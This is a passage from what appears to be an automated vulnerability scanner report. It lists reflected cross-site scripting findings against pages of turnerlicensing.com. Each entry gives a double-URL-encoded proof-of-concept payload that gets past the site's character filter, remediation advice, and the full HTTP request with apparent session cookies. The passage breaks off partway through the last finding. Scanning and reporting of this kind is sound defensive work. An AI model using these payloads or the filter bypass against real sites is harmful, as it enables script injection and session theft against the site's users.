2.173. http://www.turnerlicensing.com/book_covers [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.turnerlicensing.com
Path: /book_covers
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload c755e%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527f5f16d43fab was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as c755e'style='x:expression(alert(1))'f5f16d43fab in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC demonstrated uses a dynamically evaluated expression within a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer and may not work in other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /book_covers?c755e%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527f5f16d43fab=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;
2.174. http://www.turnerlicensing.com/box_calendars [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.turnerlicensing.com
Path: /box_calendars
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 45e75%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25275e5156453d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 45e75'style='x:expression(alert(1))'5e5156453d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC demonstrated uses a dynamically evaluated expression within a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer and may not work in other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /box_calendars?45e75%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25275e5156453d=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;
2.175. http://www.turnerlicensing.com/composition_books [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.turnerlicensing.com
Path: /composition_books
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 68ea5%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25272936e399c82 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 68ea5'style='x:expression(alert(1))'2936e399c82 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC demonstrated uses a dynamically evaluated expression within a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer and may not work in other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /composition_books?68ea5%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25272936e399c82=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;
2.176. http://www.turnerlicensing.com/desk_calendars [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.turnerlicensing.com
Path: /desk_calendars
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 6de83%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25275840fdf7ac4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 6de83'style='x:expression(alert(1))'5840fdf7ac4 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC demonstrated uses a dynamically evaluated expression within a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer and may not work in other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /desk_calendars?6de83%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25275840fdf7ac4=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;
2.177. http://www.turnerlicensing.com/home [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.turnerlicensing.com
Path: /home
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload b6ece%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25270391ff654b2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as b6ece'style='x:expression(alert(1))'0391ff654b2 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC demonstrated uses a dynamically evaluated expression within a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer and may not work in other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /home?b6ece%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25270391ff654b2=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;
2.178. http://www.turnerlicensing.com/magnetic_to-do_notes [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.turnerlicensing.com
Path: /magnetic_to-do_notes
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload ea298%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25273a5ce7edc7c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as ea298'style='x:expression(alert(1))'3a5ce7edc7c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC demonstrated uses a dynamically evaluated expression within a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer and may not work in other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /magnetic_to-do_notes?ea298%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25273a5ce7edc7c=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;
2.179. http://www.turnerlicensing.com/memo_books [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.turnerlicensing.com
Path: /memo_books
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 70115%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527e817eec67bd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 70115'style='x:expression(alert(1))'e817eec67bd in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC demonstrated uses a dynamically evaluated expression within a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer and may not work in other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /memo_books?70115%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527e817eec67bd=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;
2.180. http://www.turnerlicensing.com/nondated_combo_packs [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.turnerlicensing.com
Path: /nondated_combo_packs
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload d1120%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25278f5f8e675c5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as d1120'style='x:expression(alert(1))'8f5f8e675c5 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC demonstrated uses a dynamically evaluated expression within a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer and may not work in other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /nondated_combo_packs?d1120%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25278f5f8e675c5=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;
2.181. http://www.turnerlicensing.com/paper_and_desk_caddy [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.turnerlicensing.com
Path: /paper_and_desk_caddy
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 524ea%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252708e0d4230be was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 524ea'style='x:expression(alert(1))'08e0d4230be in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /paper_and_desk_caddy?524ea%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252708e0d4230be=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;
2.182. http://www.turnerlicensing.com/paper_cubes [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.turnerlicensing.com
Path: /paper_cubes
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 1b6f7%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252757f8f7591a8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 1b6f7'style='x:expression(alert(1))'57f8f7591a8 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /paper_cubes?1b6f7%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252757f8f7591a8=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;
2.183. http://www.turnerlicensing.com/portfolios [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.turnerlicensing.com
Path: /portfolios
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 2f0f7%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527b5a9e77cfd5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 2f0f7'style='x:expression(alert(1))'b5a9e77cfd5 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /portfolios?2f0f7%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527b5a9e77cfd5=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;
2.184. http://www.turnerlicensing.com/teams_by_state/Alabama [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.turnerlicensing.com
Path: /teams_by_state/Alabama
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload bd71c%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527b08045fc3e2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as bd71c'style='x:expression(alert(1))'b08045fc3e2 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /teams_by_state/Alabama?bd71c%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527b08045fc3e2=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;
2.185. http://www.turnerlicensing.com/teams_by_state/Alaska [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.turnerlicensing.com
Path: /teams_by_state/Alaska
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 4d41a%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25275bce84a02ce was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 4d41a'style='x:expression(alert(1))'5bce84a02ce in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /teams_by_state/Alaska?4d41a%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25275bce84a02ce=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;
2.186. http://www.turnerlicensing.com/teams_by_state/Arizona [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.turnerlicensing.com
Path: /teams_by_state/Arizona
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload a0e30%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527d86d71a4401 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as a0e30'style='x:expression(alert(1))'d86d71a4401 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /teams_by_state/Arizona?a0e30%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527d86d71a4401=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;
2.187. http://www.turnerlicensing.com/teams_by_state/Arkansas [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.turnerlicensing.com
Path: /teams_by_state/Arkansas
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 1396a%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25276e71f63c249 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 1396a'style='x:expression(alert(1))'6e71f63c249 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /teams_by_state/Arkansas?1396a%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25276e71f63c249=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;
2.188. http://www.turnerlicensing.com/teams_by_state/Calgary [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.turnerlicensing.com
Path: /teams_by_state/Calgary
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 7cdd3%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25278d075c1b2de was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 7cdd3'style='x:expression(alert(1))'8d075c1b2de in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
